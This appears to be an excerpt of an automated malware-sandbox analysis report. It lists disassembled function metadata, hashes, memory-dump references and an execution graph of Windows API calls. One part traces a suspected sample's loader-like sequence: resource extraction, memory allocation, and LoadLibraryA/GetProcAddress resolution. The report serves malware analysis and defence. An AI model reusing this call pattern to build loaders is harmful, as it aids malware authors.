                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3dee088dcf62b5dd45a3468e945a78e853955b850268245b002326c9d09cc73f
                                                                                                                                      • Instruction ID: 9bcf1bf75baa17c1a7ec4a076eca1f1d55d491a04e79fd549319f9b7072699ad
                                                                                                                                      • Opcode Fuzzy Hash: 3dee088dcf62b5dd45a3468e945a78e853955b850268245b002326c9d09cc73f
                                                                                                                                      • Instruction Fuzzy Hash: 77A1E5767106000FE71AAA7D9C843BDB3C29BC5325F1C8A7EE11DCB381EBE5CA529650
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C39562), ref: 02C394FA
                                                                                                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C39562), ref: 02C39500
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DateFormatLocaleThread
                                                                                                                                      • String ID: yyyy
                                                                                                                                      • API String ID: 3303714858-3145165042
                                                                                                                                      • Opcode ID: e8cbe5347237f9231f1453603d22ee538a6ff92d5f52480513472a2ad1969d14
                                                                                                                                      • Instruction ID: 42bf79a3030425f2388e956dcce8472af4b7c7849ff9dcd2d3b24920c40a3695
                                                                                                                                      • Opcode Fuzzy Hash: e8cbe5347237f9231f1453603d22ee538a6ff92d5f52480513472a2ad1969d14
                                                                                                                                      • Instruction Fuzzy Hash: B4219172A002189FDB26DF98C841AEEB3B9EF48710F5148A5F905E7240D770DF40DBA5
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C48216), ref: 02C481F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                      • API String ID: 3811539418-184458249
                                                                                                                                      • Opcode ID: de7bcf165989e69898ea97bb35779b866e2eb7b7921b34bf3f247a1841a8efb2
                                                                                                                                      • Instruction ID: 12752efd59256f4f74b27ab06736506f234e74a9d99720cceabbb88915c312ba
                                                                                                                                      • Opcode Fuzzy Hash: de7bcf165989e69898ea97bb35779b866e2eb7b7921b34bf3f247a1841a8efb2
                                                                                                                                      • Instruction Fuzzy Hash: 39018175650304BFEB25EFA4DC42F5F77ADEB48B10F614A60F908D3640DA74AD10AB24
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocValue
                                                                                                                                      • String ID: Z
                                                                                                                                      • API String ID: 1189806713-3659616827
                                                                                                                                      • Opcode ID: c7afc902e072ce32c628bf018933150947fad0e85db6de1f90f7632155adcf30
                                                                                                                                      • Instruction ID: b50aed14cb4bcc2e0e16fa0301c5841a4d85ff1b6f364582e47b8402344f6603
                                                                                                                                      • Opcode Fuzzy Hash: c7afc902e072ce32c628bf018933150947fad0e85db6de1f90f7632155adcf30
                                                                                                                                      • Instruction Fuzzy Hash: D4C08CB0E80320AAEB02FBB0D00470932ADEB01344F208E20B404C710CDB35C090EF1C
                                                                                                                                      APIs
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AD98
                                                                                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C4ADC8
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02C4ADE7
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4ADF3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Read$Write
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3448952669-0
                                                                                                                                      • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                      • Instruction ID: 9a75b562804b8b195a977d92a0dee1ee275df803f1740a763ebf72c929afcb46
                                                                                                                                      • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                      • Instruction Fuzzy Hash: 3021B4B1A80619ABDB10CF69CC80BAFB7B9EF84352F104511EE1097344EF34D911EAA4

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3%
Total number of Nodes: 1930
Total number of Limit Nodes: 69
__output_l 6 API calls 15140->15142 15143 41637c 15141->15143 15142->15144 15145 40e744 __output_l 6 API calls 15143->15145 15144->15085 15144->15099 15145->15144 15149 417d1f 15146->15149 15152 417d51 15146->15152 15147 417c1d __strnicmp_l 98 API calls 15150 417d39 15147->15150 15148 417d24 15151 40bfc1 __output_l 63 API calls 15148->15151 15149->15148 15149->15152 15150->15144 15153 417d29 15151->15153 15152->15147 15154 40e744 __output_l 6 API calls 15153->15154 15154->15150 15158 416200 __fcloseall 15155->15158 15156 416213 15157 40bfc1 __output_l 63 API calls 15156->15157 15160 416218 15157->15160 15158->15156 15159 416251 15158->15159 15166 415ad5 15159->15166 15162 40e744 __output_l 6 API calls 15160->15162 15165 416227 __fcloseall 15162->15165 15165->15117 15167 415afa 15166->15167 15226 418153 15167->15226 15170 40e61c __invoke_watson 10 API calls 15175 415b25 15170->15175 15171 415b5e 15172 40bfd4 __lseeki64 63 API calls 15171->15172 15173 415b63 15172->15173 15174 40bfc1 __output_l 63 API calls 15173->15174 15176 415b6d 15174->15176 15175->15171 15178 415c1e 15175->15178 15177 40e744 __output_l 6 API calls 15176->15177 15206 415b7c 15177->15206 15232 415660 15178->15232 15180 415cc0 15181 415ce1 CreateFileA 15180->15181 15182 415cc7 15180->15182 15184 415d7b GetFileType 15181->15184 15185 415d0e 15181->15185 15183 40bfd4 __lseeki64 63 API calls 15182->15183 15188 415ccc 15183->15188 15186 415d88 GetLastError 15184->15186 15187 415dcc 15184->15187 15189 415d47 GetLastError 15185->15189 15192 415d22 CreateFileA 15185->15192 15190 40bfe7 __dosmaperr 63 API calls 15186->15190 15250 41541b 15187->15250 15191 40bfc1 __output_l 63 API calls 15188->15191 15193 40bfe7 __dosmaperr 63 API calls 15189->15193 15194 415db1 CloseHandle 15190->15194 15195 415cd6 15191->15195 15192->15184 15192->15189 15193->15195 15194->15195 15196 415dbf 15194->15196 15198 40bfc1 __output_l 63 API calls 15195->15198 15199 40bfc1 __output_l 63 API calls 15196->15199 15198->15206 
15199->15195 15200 41600a 15203 416177 CloseHandle CreateFileA 15200->15203 15200->15206 15202 4118c4 __lseek_nolock 65 API calls 15204 415e51 15202->15204 15205 4161a2 GetLastError 15203->15205 15203->15206 15208 40bfd4 __lseeki64 63 API calls 15204->15208 15218 415e60 15204->15218 15207 40bfe7 __dosmaperr 63 API calls 15205->15207 15222 416292 15206->15222 15210 4161ae 15207->15210 15208->15218 15209 40fd32 73 API calls __read_nolock 15209->15218 15211 41549c __free_osfhnd 64 API calls 15210->15211 15211->15206 15212 4118c4 65 API calls __lseek_nolock 15212->15218 15213 410a0b __close_nolock 66 API calls 15213->15218 15215 40f944 __locking 97 API calls 15215->15218 15216 414f8f 65 API calls __lseeki64_nolock 15216->15218 15217 416072 15219 410a0b __close_nolock 66 API calls 15217->15219 15218->15200 15218->15209 15218->15212 15218->15213 15218->15215 15218->15216 15218->15217 15259 417ee1 15218->15259 15220 416079 15219->15220 15221 40bfc1 __output_l 63 API calls 15220->15221 15221->15206 15223 416297 15222->15223 15224 4162be 15222->15224 15298 415639 LeaveCriticalSection 15223->15298 15224->15165 15227 418162 15226->15227 15228 415b16 15226->15228 15229 40bfc1 __output_l 63 API calls 15227->15229 15228->15170 15228->15175 15230 418167 15229->15230 15231 40e744 __output_l 6 API calls 15230->15231 15231->15228 15233 41566c __fcloseall 15232->15233 15234 40d61d __mtinitlocknum 63 API calls 15233->15234 15235 41567c 15234->15235 15236 40d6e0 __lock 63 API calls 15235->15236 15237 415681 __fcloseall 15235->15237 15246 415690 15236->15246 15237->15180 15238 4157d3 15293 4157f1 15238->15293 15239 415769 15241 411cba __calloc_crt 63 API calls 15239->15241 15244 415772 15241->15244 15242 40d6e0 __lock 63 API calls 15242->15246 15243 415711 EnterCriticalSection 15245 415721 LeaveCriticalSection 15243->15245 15243->15246 15244->15238 15247 415599 ___lock_fhandle 64 API calls 15244->15247 15245->15246 15246->15238 15246->15239 15246->15242 15246->15243 15248 41389c 
__ioinit InitializeCriticalSectionAndSpinCount 15246->15248 15290 415733 15246->15290 15247->15238 15248->15246 15251 415482 15250->15251 15252 415429 15250->15252 15253 40bfc1 __output_l 63 API calls 15251->15253 15252->15251 15258 41544d 15252->15258 15254 415487 15253->15254 15255 40bfd4 __lseeki64 63 API calls 15254->15255 15256 415478 15255->15256 15256->15200 15256->15202 15256->15218 15257 415472 SetStdHandle 15257->15256 15258->15256 15258->15257 15260 414f8f __lseeki64_nolock 65 API calls 15259->15260 15261 417f00 15260->15261 15262 414f8f __lseeki64_nolock 65 API calls 15261->15262 15270 417f63 15261->15270 15265 417f1c 15262->15265 15263 40bfc1 __output_l 63 API calls 15273 417f6e 15263->15273 15264 417f42 GetProcessHeap HeapAlloc 15266 417f5e 15264->15266 15279 417f75 __setmode_nolock 15264->15279 15265->15264 15268 417ffe 15265->15268 15265->15270 15269 40bfc1 __output_l 63 API calls 15266->15269 15267 414f8f __lseeki64_nolock 65 API calls 15267->15270 15271 414f8f __lseeki64_nolock 65 API calls 15268->15271 15286 418067 15268->15286 15269->15270 15270->15263 15270->15273 15272 418017 15271->15272 15272->15270 15274 415522 __lseek_nolock 63 API calls 15272->15274 15273->15218 15275 41802d SetEndOfFile 15274->15275 15276 41804a 15275->15276 15275->15286 15278 40bfc1 __output_l 63 API calls 15276->15278 15277 40f211 __write_nolock 95 API calls 15277->15279 15280 41804f 15278->15280 15279->15277 15281 417fe1 15279->15281 15289 417fb8 __setmode_nolock 15279->15289 15283 40bfd4 __lseeki64 63 API calls 15280->15283 15282 40bfd4 __lseeki64 63 API calls 15281->15282 15284 417fe6 15282->15284 15285 41805a GetLastError 15283->15285 15288 40bfc1 __output_l 63 API calls 15284->15288 15284->15289 15285->15286 15286->15267 15286->15270 15287 417fc6 GetProcessHeap HeapFree 15287->15286 15288->15289 15289->15287 15296 40d606 LeaveCriticalSection 15290->15296 15292 41573a 15292->15246 15297 40d606 LeaveCriticalSection 15293->15297 15295 4157f8 15295->15237 15296->15292 
15297->15295 15298->15224 15300 40fb9c _fputc 2 API calls 15299->15300 15301 40cad7 15300->15301 15301->15021 15303 40fb9c _fputc 2 API calls 15302->15303 15304 40c951 15303->15304 15304->15042 14351 40aedb 14356 40aecb 14351->14356 14354 40aef4 14355 40aec0 moneypunct 64 API calls 14355->14354 14359 40cfdc 14356->14359 14358 40aed9 14358->14354 14358->14355 14360 40cfe8 __fcloseall 14359->14360 14361 40d6e0 __lock 63 API calls 14360->14361 14366 40cfef 14361->14366 14362 40d028 14369 40d043 14362->14369 14364 40d039 __fcloseall 14364->14358 14365 40d01f 14367 40b6b5 __output_l 63 API calls 14365->14367 14366->14362 14366->14365 14368 40b6b5 __output_l 63 API calls 14366->14368 14367->14362 14368->14365 14372 40d606 LeaveCriticalSection 14369->14372 14371 40d04a 14371->14364 14372->14371 12173 40cbdd 12174 40cbe9 __fcloseall 12173->12174 12208 40d534 HeapCreate 12174->12208 12177 40cc46 12210 41087e GetModuleHandleW 12177->12210 12181 40cc57 __RTC_Initialize 12244 411a15 12181->12244 12182 40cbb4 _fast_error_exit 63 API calls 12182->12181 12184 40cc66 12185 40cc72 GetCommandLineA 12184->12185 12384 40e79a 12184->12384 12259 412892 12185->12259 12192 40cc97 12298 41255f 12192->12298 12193 40e79a __amsg_exit 63 API calls 12193->12192 12196 40cca8 12313 40e859 12196->12313 12197 40e79a __amsg_exit 63 API calls 12197->12196 12199 40ccb0 12200 40ccbb 12199->12200 12201 40e79a __amsg_exit 63 API calls 12199->12201 12319 4019f0 OleInitialize 12200->12319 12201->12200 12203 40ccd8 12204 40ccea 12203->12204 12373 40ea0a 12203->12373 12391 40ea36 12204->12391 12207 40ccef __fcloseall 12209 40cc3a 12208->12209 12209->12177 12376 40cbb4 12209->12376 12211 410892 12210->12211 12212 410899 12210->12212 12394 40e76a 12211->12394 12214 410a01 12212->12214 12215 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12212->12215 12453 410598 12214->12453 12217 4108ec TlsAlloc 12215->12217 12219 40cc4c 12217->12219 12221 41093a TlsSetValue 12217->12221 12219->12181 
12219->12182 12221->12219 12222 41094b 12221->12222 12398 40ea54 12222->12398 12227 41046e __encode_pointer 6 API calls 12228 41096b 12227->12228 12229 41046e __encode_pointer 6 API calls 12228->12229 12230 41097b 12229->12230 12231 41046e __encode_pointer 6 API calls 12230->12231 12232 41098b 12231->12232 12415 40d564 12232->12415 12239 4104e9 __decode_pointer 6 API calls 12240 4109df 12239->12240 12240->12214 12241 4109e6 12240->12241 12435 4105d5 12241->12435 12243 4109ee GetCurrentThreadId 12243->12219 12759 40e1d8 12244->12759 12246 411a21 GetStartupInfoA 12247 411cba __calloc_crt 63 API calls 12246->12247 12253 411a42 12247->12253 12248 411c60 __fcloseall 12248->12184 12249 411bdd GetStdHandle 12258 411ba7 12249->12258 12250 411cba __calloc_crt 63 API calls 12250->12253 12251 411c42 SetHandleCount 12251->12248 12252 411bef GetFileType 12252->12258 12253->12248 12253->12250 12255 411b2a 12253->12255 12253->12258 12254 411b53 GetFileType 12254->12255 12255->12248 12255->12254 12257 41389c __ioinit InitializeCriticalSectionAndSpinCount 12255->12257 12255->12258 12256 41389c __ioinit InitializeCriticalSectionAndSpinCount 12256->12258 12257->12255 12258->12248 12258->12249 12258->12251 12258->12252 12258->12256 12260 4128b0 GetEnvironmentStringsW 12259->12260 12263 4128cf 12259->12263 12261 4128c4 GetLastError 12260->12261 12262 4128b8 12260->12262 12261->12263 12264 4128eb GetEnvironmentStringsW 12262->12264 12265 4128fa WideCharToMultiByte 12262->12265 12263->12262 12267 412968 12263->12267 12264->12265 12268 40cc82 12264->12268 12271 41295d FreeEnvironmentStringsW 12265->12271 12272 41292e 12265->12272 12266 412971 GetEnvironmentStrings 12266->12268 12269 412981 12266->12269 12267->12266 12267->12268 12285 4127d7 12268->12285 12274 411c75 __malloc_crt 63 API calls 12269->12274 12271->12268 12275 411c75 __malloc_crt 63 API calls 12272->12275 12276 41299b 12274->12276 12277 412934 12275->12277 12278 4129a2 FreeEnvironmentStringsA 12276->12278 12279 4129ae 
_realloc 12276->12279 12277->12271 12280 41293c WideCharToMultiByte 12277->12280 12278->12268 12283 4129b8 FreeEnvironmentStringsA 12279->12283 12281 412956 12280->12281 12282 41294e 12280->12282 12281->12271 12284 40b6b5 __output_l 63 API calls 12282->12284 12283->12268 12284->12281 12286 4127f1 GetModuleFileNameA 12285->12286 12287 4127ec 12285->12287 12289 412818 12286->12289 12766 41446b 12287->12766 12760 41263d 12289->12760 12292 40cc8c 12292->12192 12292->12193 12293 412854 12294 411c75 __malloc_crt 63 API calls 12293->12294 12295 41285a 12294->12295 12295->12292 12296 41263d _parse_cmdline 73 API calls 12295->12296 12297 412874 12296->12297 12297->12292 12299 412568 12298->12299 12301 41256d _strlen 12298->12301 12300 41446b ___initmbctable 107 API calls 12299->12300 12300->12301 12302 411cba __calloc_crt 63 API calls 12301->12302 12305 40cc9d 12301->12305 12308 4125a2 _strlen 12302->12308 12303 412600 12304 40b6b5 __output_l 63 API calls 12303->12304 12304->12305 12305->12196 12305->12197 12306 411cba __calloc_crt 63 API calls 12306->12308 12307 412626 12310 40b6b5 __output_l 63 API calls 12307->12310 12308->12303 12308->12305 12308->12306 12308->12307 12309 40ef42 _strcpy_s 63 API calls 12308->12309 12312 4125e7 12308->12312 12309->12308 12310->12305 12311 40e61c __invoke_watson 10 API calls 12311->12312 12312->12308 12312->12311 12314 40e867 __IsNonwritableInCurrentImage 12313->12314 13177 413586 12314->13177 12316 40e885 __initterm_e 12318 40e8a4 __IsNonwritableInCurrentImage __initterm 12316->12318 13181 40d2bd 12316->13181 12318->12199 12320 401ab9 12319->12320 13281 40b99e 12320->13281 12322 401abf 12323 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 12322->12323 12349 402467 12322->12349 12324 401dc3 CloseHandle GetModuleHandleA 12323->12324 12325 401c55 12323->12325 13294 401650 12324->13294 12331 401c9c CloseHandle 12325->12331 12336 401cf9 Module32Next 12325->12336 12327 401e8b FindResourceA LoadResource LockResource 
SizeofResource 12328 40b84d _malloc 63 API calls 12327->12328 12329 401ebf 12328->12329 13296 40af66 12329->13296 12331->12203 12332 401ecb _memset 12333 401efc SizeofResource 12332->12333 12334 401f1c 12333->12334 12335 401f5f 12333->12335 12334->12335 13334 401560 12334->13334 12338 401f92 _memset 12335->12338 12339 401560 __VEC_memcpy 12335->12339 12336->12324 12345 401d0f 12336->12345 12340 401fa2 FreeResource 12338->12340 12339->12338 12341 40b84d _malloc 63 API calls 12340->12341 12342 401fbb SizeofResource 12341->12342 12343 401fe5 _memset 12342->12343 12344 4020aa LoadLibraryA 12343->12344 12346 401650 12344->12346 12345->12331 12348 401dad Module32Next 12345->12348 12347 40216c GetProcAddress 12346->12347 12347->12349 12350 4021aa 12347->12350 12348->12324 12348->12345 12349->12203 12350->12349 13308 4018f0 12350->13308 12352 40243f 12352->12349 12353 40b6b5 __output_l 63 API calls 12352->12353 12353->12349 12354 4021f1 12354->12352 13320 401870 12354->13320 12356 402269 #8 12357 401870 76 API calls 12356->12357 12358 40228b #8 12357->12358 12359 4022a7 12358->12359 12360 4022d9 #15 #23 12359->12360 13325 40b350 12360->13325 12363 40232c 12364 402354 #16 12363->12364 12365 40235b 12363->12365 12364->12365 12366 402392 #411 12365->12366 12367 4023a4 12366->12367 12368 4023bc #9 #9 12367->12368 13327 4019a0 12368->13327 12371 40242e 12372 4019a0 66 API calls 12371->12372 12372->12352 13599 40e8de 12373->13599 12375 40ea1b 12375->12204 12377 40cbc2 12376->12377 12378 40cbc7 12376->12378 12379 40ec4d __FF_MSGBANNER 63 API calls 12377->12379 12380 40eaa2 __NMSG_WRITE 63 API calls 12378->12380 12379->12378 12381 40cbcf 12380->12381 12382 40e7ee _doexit 4 API calls 12381->12382 12383 40cbd9 12382->12383 12383->12177 12385 40ec4d __FF_MSGBANNER 63 API calls 12384->12385 12386 40e7a4 12385->12386 12387 40eaa2 __NMSG_WRITE 63 API calls 12386->12387 12388 40e7ac 12387->12388 12389 4104e9 __decode_pointer 6 API calls 12388->12389 12390 40cc71 12389->12390 12390->12185 
12392 40e8de _doexit 63 API calls 12391->12392 12393 40ea41 12392->12393 12393->12207 12395 40e775 Sleep GetModuleHandleW 12394->12395 12396 40e793 12395->12396 12397 40e797 12395->12397 12396->12395 12396->12397 12397->12212 12459 4104e0 12398->12459 12400 40ea5c __init_pointers __initp_misc_winsig 12462 41393d 12400->12462 12403 41046e __encode_pointer 6 API calls 12404 40ea98 12403->12404 12405 41046e TlsGetValue 12404->12405 12406 4104a7 GetModuleHandleW 12405->12406 12407 410486 12405->12407 12409 4104c2 GetProcAddress 12406->12409 12410 4104b7 12406->12410 12407->12406 12408 410490 TlsGetValue 12407->12408 12412 41049b 12408->12412 12414 41049f 12409->12414 12411 40e76a __crt_waiting_on_module_handle 2 API calls 12410->12411 12413 4104bd 12411->12413 12412->12406 12412->12414 12413->12409 12413->12414 12414->12227 12416 40d56f 12415->12416 12418 40d59d 12416->12418 12465 41389c 12416->12465 12418->12214 12419 4104e9 TlsGetValue 12418->12419 12420 410501 12419->12420 12421 410522 GetModuleHandleW 12419->12421 12420->12421 12422 41050b TlsGetValue 12420->12422 12423 410532 12421->12423 12424 41053d GetProcAddress 12421->12424 12426 410516 12422->12426 12425 40e76a __crt_waiting_on_module_handle 2 API calls 12423->12425 12428 41051a 12424->12428 12427 410538 12425->12427 12426->12421 12426->12428 12427->12424 12427->12428 12428->12214 12429 411cba 12428->12429 12432 411cc3 12429->12432 12431 4109c5 12431->12214 12431->12239 12432->12431 12433 411ce1 Sleep 12432->12433 12470 40e231 12432->12470 12434 411cf6 12433->12434 12434->12431 12434->12432 12738 40e1d8 12435->12738 12437 4105e1 GetModuleHandleW 12438 4105f1 12437->12438 12442 4105f7 12437->12442 12439 40e76a __crt_waiting_on_module_handle 2 API calls 12438->12439 12439->12442 12440 410633 12443 40d6e0 __lock 59 API calls 12440->12443 12441 41060f GetProcAddress GetProcAddress 12441->12440 12442->12440 12442->12441 12444 410652 InterlockedIncrement 12443->12444 12739 4106aa 12444->12739 12447 40d6e0 __lock 
59 API calls 12448 410673 12447->12448 12742 4145d2 InterlockedIncrement 12448->12742 12450 410691 12754 4106b3 12450->12754 12452 41069e __fcloseall 12452->12243 12454 4105a2 12453->12454 12455 4105ae 12453->12455 12458 4104e9 __decode_pointer 6 API calls 12454->12458 12456 4105d0 12455->12456 12457 4105c2 TlsFree 12455->12457 12456->12456 12457->12456 12458->12455 12460 41046e __encode_pointer 6 API calls 12459->12460 12461 4104e7 12460->12461 12461->12400 12463 41046e __encode_pointer 6 API calls 12462->12463 12464 40ea8e 12463->12464 12464->12403 12469 40e1d8 12465->12469 12467 4138a8 InitializeCriticalSectionAndSpinCount 12468 4138ec __fcloseall 12467->12468 12468->12416 12469->12467 12471 40e23d __fcloseall 12470->12471 12472 40e255 12471->12472 12482 40e274 _memset 12471->12482 12483 40bfc1 12472->12483 12475 40e2e6 HeapAlloc 12475->12482 12479 40e26a __fcloseall 12479->12432 12482->12475 12482->12479 12489 40d6e0 12482->12489 12496 40def2 12482->12496 12502 40e32d 12482->12502 12505 40d2e3 12482->12505 12508 4106bc GetLastError 12483->12508 12485 40bfc6 12486 40e744 12485->12486 12487 4104e9 __decode_pointer 6 API calls 12486->12487 12488 40e754 __invoke_watson 12487->12488 12490 40d6f5 12489->12490 12491 40d708 EnterCriticalSection 12489->12491 12533 40d61d 12490->12533 12491->12482 12493 40d6fb 12493->12491 12494 40e79a __amsg_exit 62 API calls 12493->12494 12495 40d707 12494->12495 12495->12491 12497 40df20 12496->12497 12498 40dfc2 12497->12498 12501 40dfb9 12497->12501 12726 40da59 12497->12726 12498->12482 12501->12498 12733 40db09 12501->12733 12737 40d606 LeaveCriticalSection 12502->12737 12504 40e334 12504->12482 12506 4104e9 __decode_pointer 6 API calls 12505->12506 12507 40d2f3 12506->12507 12507->12482 12522 410564 TlsGetValue 12508->12522 12511 410729 SetLastError 12511->12485 12512 411cba __calloc_crt 60 API calls 12513 4106e7 12512->12513 12513->12511 12514 4104e9 __decode_pointer 6 API calls 12513->12514 12515 410701 12514->12515 12516 
410720 12515->12516 12517 410708 12515->12517 12527 40b6b5 12516->12527 12518 4105d5 __initptd 60 API calls 12517->12518 12520 410710 GetCurrentThreadId 12518->12520 12520->12511 12521 410726 12521->12511 12523 410594 12522->12523 12524 410579 12522->12524 12523->12511 12523->12512 12525 4104e9 __decode_pointer 6 API calls 12524->12525 12526 410584 TlsSetValue 12525->12526 12526->12523 12528 40b6c1 __fcloseall 12527->12528 12529 40b714 HeapFree 12528->12529 12531 40b73d __fcloseall 12528->12531 12530 40b727 12529->12530 12529->12531 12532 40bfc1 __output_l 62 API calls 12530->12532 12531->12521 12532->12531 12534 40d629 __fcloseall 12533->12534 12535 40d64f 12534->12535 12559 40ec4d 12534->12559 12544 40d65f __fcloseall 12535->12544 12605 411c75 12535->12605 12542 40d680 12547 40d6e0 __lock 63 API calls 12542->12547 12543 40d671 12546 40bfc1 __output_l 63 API calls 12543->12546 12544->12493 12546->12544 12548 40d687 12547->12548 12549 40d6bb 12548->12549 12550 40d68f 12548->12550 12551 40b6b5 __output_l 63 API calls 12549->12551 12552 41389c __ioinit InitializeCriticalSectionAndSpinCount 12550->12552 12558 40d6ac 12551->12558 12553 40d69a 12552->12553 12554 40b6b5 __output_l 63 API calls 12553->12554 12553->12558 12556 40d6a6 12554->12556 12557 40bfc1 __output_l 63 API calls 12556->12557 12557->12558 12610 40d6d7 12558->12610 12613 413d5b 12559->12613 12562 40ec61 12564 40eaa2 __NMSG_WRITE 63 API calls 